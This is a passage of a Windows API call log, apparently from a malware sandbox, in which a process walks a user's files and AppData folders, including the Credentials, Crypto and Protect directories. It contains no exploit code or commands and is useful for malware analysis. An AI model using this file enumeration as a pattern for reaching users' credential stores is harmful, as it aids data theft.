returned 1 [0221.399] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef6c | out: lpFindFileData=0x36ef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x99d50ad0, ftCreationTime.dwHighDateTime=0x1d7e768, ftLastAccessTime.dwLowDateTime=0x5df83750, ftLastAccessTime.dwHighDateTime=0x1d7e77f, ftLastWriteTime.dwLowDateTime=0x5df83750, ftLastWriteTime.dwHighDateTime=0x1d7e77f, nFileSizeHigh=0x0, nFileSizeLow=0x26e7, dwReserved0=0x0, dwReserved1=0x0, cFileName="QfEVJ04rbXO8vaXHtEqn.jpg", cAlternateFileName="QFEVJ0~1.JPG")) returned 1 [0221.399] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef6c | out: lpFindFileData=0x36ef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a9603e0, ftCreationTime.dwHighDateTime=0x1d7e252, ftLastAccessTime.dwLowDateTime=0xb8431b70, ftLastAccessTime.dwHighDateTime=0x1d7e26c, ftLastWriteTime.dwLowDateTime=0xb8431b70, ftLastWriteTime.dwHighDateTime=0x1d7e26c, nFileSizeHigh=0x0, nFileSizeLow=0xe07d, dwReserved0=0x0, dwReserved1=0x0, cFileName="rc23C0f4YGATkj.xlsx", cAlternateFileName="RC23C0~1.XLS")) returned 1 [0221.399] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef6c | out: lpFindFileData=0x36ef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x534d21d0, ftCreationTime.dwHighDateTime=0x1d7da7d, ftLastAccessTime.dwLowDateTime=0x4f5d5d10, ftLastAccessTime.dwHighDateTime=0x1d7e2ac, ftLastWriteTime.dwLowDateTime=0x4f5d5d10, ftLastWriteTime.dwHighDateTime=0x1d7e2ac, nFileSizeHigh=0x0, nFileSizeLow=0x141c2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sz6R_.csv", cAlternateFileName="")) returned 1 [0221.399] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef6c | out: lpFindFileData=0x36ef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeaaf02a0, ftCreationTime.dwHighDateTime=0x1d7d92e, ftLastAccessTime.dwLowDateTime=0xc8d4c7f0, ftLastAccessTime.dwHighDateTime=0x1d7e2f2, ftLastWriteTime.dwLowDateTime=0xc8d4c7f0, ftLastWriteTime.dwHighDateTime=0x1d7e2f2, nFileSizeHigh=0x0, nFileSizeLow=0x4efb, dwReserved0=0x0, dwReserved1=0x0, cFileName="TFOs4 V.rtf", cAlternateFileName="TFOS4V~1.RTF")) returned 1 [0221.399] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef6c | out: lpFindFileData=0x36ef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3efeb900, ftCreationTime.dwHighDateTime=0x1d7df69, ftLastAccessTime.dwLowDateTime=0xcfd673f0, ftLastAccessTime.dwHighDateTime=0x1d7e671, ftLastWriteTime.dwLowDateTime=0xcfd673f0, ftLastWriteTime.dwHighDateTime=0x1d7e671, nFileSizeHigh=0x0, nFileSizeLow=0x7fc7, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcIqgWH.m4a", cAlternateFileName="")) returned 1 [0221.399] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef6c | out: lpFindFileData=0x36ef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xfb3fcef0, ftCreationTime.dwHighDateTime=0x1d7d96b, ftLastAccessTime.dwLowDateTime=0x9ad4bac0, ftLastAccessTime.dwHighDateTime=0x1d7e5ab, ftLastWriteTime.dwLowDateTime=0x9ad4bac0, ftLastWriteTime.dwHighDateTime=0x1d7e5ab, nFileSizeHigh=0x0, nFileSizeLow=0x721, dwReserved0=0x0, dwReserved1=0x0, cFileName="yw2zR4KZkYpV9o1h.ods", cAlternateFileName="YW2ZR4~1.ODS")) returned 1 [0221.399] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef6c | out: lpFindFileData=0x36ef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x502f1d40, ftCreationTime.dwHighDateTime=0x1d7e523, ftLastAccessTime.dwLowDateTime=0xca66960, ftLastAccessTime.dwHighDateTime=0x1d7e600, ftLastWriteTime.dwLowDateTime=0xca66960, ftLastWriteTime.dwHighDateTime=0x1d7e600, nFileSizeHigh=0x0, nFileSizeLow=0x2ac5, dwReserved0=0x0, dwReserved1=0x0, cFileName="Z1kj6woY0I.mkv", cAlternateFileName="Z1KJ6W~1.MKV")) returned 1 [0221.399] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef6c | out: lpFindFileData=0x36ef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa7172940, ftCreationTime.dwHighDateTime=0x1d7d96b, ftLastAccessTime.dwLowDateTime=0xcad055e0, ftLastAccessTime.dwHighDateTime=0x1d7df39, ftLastWriteTime.dwLowDateTime=0xcad055e0, ftLastWriteTime.dwHighDateTime=0x1d7df39, nFileSizeHigh=0x0, nFileSizeLow=0x5ad7, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZX9ZyDs.mp3", cAlternateFileName="")) returned 1 [0221.399] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef6c | out: lpFindFileData=0x36ef6c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa7172940, ftCreationTime.dwHighDateTime=0x1d7d96b, ftLastAccessTime.dwLowDateTime=0xcad055e0, ftLastAccessTime.dwHighDateTime=0x1d7df39, ftLastWriteTime.dwLowDateTime=0xcad055e0, ftLastWriteTime.dwHighDateTime=0x1d7df39, nFileSizeHigh=0x0, nFileSizeLow=0x5ad7, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZX9ZyDs.mp3", cAlternateFileName="")) returned 0 [0221.399] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.400] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef24) returned 1 [0221.400] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f184) returned 1 [0221.400] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Identities", nBufferLength=0x105, lpBuffer=0x36ecc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Identities", lpFilePart=0x0) returned 0x2d [0221.400] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a4) returned 1 [0221.400] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Identities", nBufferLength=0x105, lpBuffer=0x36ec84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Identities", lpFilePart=0x0) returned 0x2d [0221.400] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Identities\\*", lpFindFileData=0x36ef54 | out: lpFindFileData=0x36ef54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.403] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.403] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{31810C36-5D23-4CCE-A3B4-316DED195C38}", cAlternateFileName="{31810~1")) returned 1 [0221.403] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{31810C36-5D23-4CCE-A3B4-316DED195C38}", cAlternateFileName="{31810~1")) returned 0 [0221.403] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.404] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef14) returned 1 [0221.404] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f174) returned 1 [0221.404] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f120) returned 1 [0221.404] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Identities", nBufferLength=0x105, lpBuffer=0x36ec00, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Identities", lpFilePart=0x0) returned 0x2d [0221.404] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Identities\\*", lpFindFileData=0x36eed0 | out: lpFindFileData=0x36eed0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.404] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.405] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{31810C36-5D23-4CCE-A3B4-316DED195C38}", cAlternateFileName="{31810~1")) returned 1 [0221.405] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eed8 | out: lpFindFileData=0x36eed8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0221.405] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.405] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ee90) returned 1 [0221.405] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f0f0) returned 1 [0221.405] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}", nBufferLength=0x105, lpBuffer=0x36ec2c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpFilePart=0x0) returned 0x54 [0221.405] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f110) returned 1 [0221.405] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}", nBufferLength=0x105, lpBuffer=0x36ebf0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}", lpFilePart=0x0) returned 0x54 [0221.406] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Identities\\{31810C36-5D23-4CCE-A3B4-316DED195C38}\\*", lpFindFileData=0x36eec0 | out: lpFindFileData=0x36eec0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.406] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.406] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36eec8 | out: lpFindFileData=0x36eec8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7964c250, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7964c250, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf2c805c8, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0221.406] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.406] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ee80) returned 1 [0221.406] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f0e0) returned 1 [0221.406] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft", nBufferLength=0x105, lpBuffer=0x36ecc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft", lpFilePart=0x0) returned 0x2c [0221.407] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f1a4) returned 1 [0221.407] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft", nBufferLength=0x105, lpBuffer=0x36ec84, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft", lpFilePart=0x0) returned 0x2c [0221.407] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft\\*", lpFindFileData=0x36ef54 | out: lpFindFileData=0x36ef54*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x426ba7c0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x426ba7c0, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x76a908 [0221.407] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x426ba7c0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x426ba7c0, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0221.407] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3b3af0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3b3af0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3b3af0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AddIns", cAlternateFileName="")) returned 1 [0221.407] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x285f4ad0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x285f4ad0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x285f4ad0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bibliography", cAlternateFileName="BIBLIO~1")) returned 1 [0221.407] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xea43994d, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Credentials", cAlternateFileName="CREDEN~1")) returned 1 [0221.407] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x796260f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x796260f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x160a67d7, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Crypto", cAlternateFileName="")) returned 1 [0221.407] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28986bd0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x28986bd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x28986bd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Document Building Blocks", cAlternateFileName="DOCUME~1")) returned 1 [0221.407] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3d9c50, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3d9c50, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3d9c50, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Excel", cAlternateFileName="")) returned 1 [0221.408] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x795fff90, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795fff90, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xfda27f60, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0221.408] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82d9eea0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x82d9eea0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x82d9eea0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Network", cAlternateFileName="")) returned 1 [0221.408] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28666ef0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x2b32ecd0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x2b32ecd0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Office", cAlternateFileName="")) returned 1 [0221.408] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x500531d0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x5b267fb0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x5b267fb0, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook", cAlternateFileName="")) returned 1 [0221.408] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x42694660, ftCreationTime.dwHighDateTime=0x1d7b065, ftLastAccessTime.dwLowDateTime=0x42694660, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x42694660, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Proof", cAlternateFileName="")) returned 1 [0221.408] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795d9e30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x30b088f0, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x30b088f0, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Protect", cAlternateFileName="")) returned 1 [0221.408] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x795b3cd0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x96779c3, ftLastWriteTime.dwHighDateTime=0x1cb8927, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemCertificates", cAlternateFileName="SYSTEM~1")) returned 1 [0221.408] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x21509730, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x3e1d8b20, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x3e1d8b20, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0221.408] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x426ba7c0, ftCreationTime.dwHighDateTime=0x1d7b065, ftLastAccessTime.dwLowDateTime=0x426ba7c0, ftLastAccessTime.dwHighDateTime=0x1d7b065, ftLastWriteTime.dwLowDateTime=0x426ba7c0, ftLastWriteTime.dwHighDateTime=0x1d7b065, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UProof", cAlternateFileName="")) returned 1 [0221.408] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x795b3cd0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xf96b9c4c, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 1 [0221.408] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x286ff470, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x286ff470, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x286ff470, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Word", cAlternateFileName="")) returned 1 [0221.408] FindNextFileW (in: hFindFile=0x76a908, lpFindFileData=0x36ef5c | out: lpFindFileData=0x36ef5c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x286ff470, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x286ff470, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x286ff470, ftLastWriteTime.dwHighDateTime=0x1d70912, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Word", cAlternateFileName="")) returned 0 [0221.408] FindClose (in: hFindFile=0x76a908 | out: hFindFile=0x76a908) returned 1 [0221.408] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36ef14) returned 1 [0221.408] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x36f174) returned 1 [0221.409] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x36f120) returned 1 [0221.409] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\Microsoft", nBufferLength=0x105, 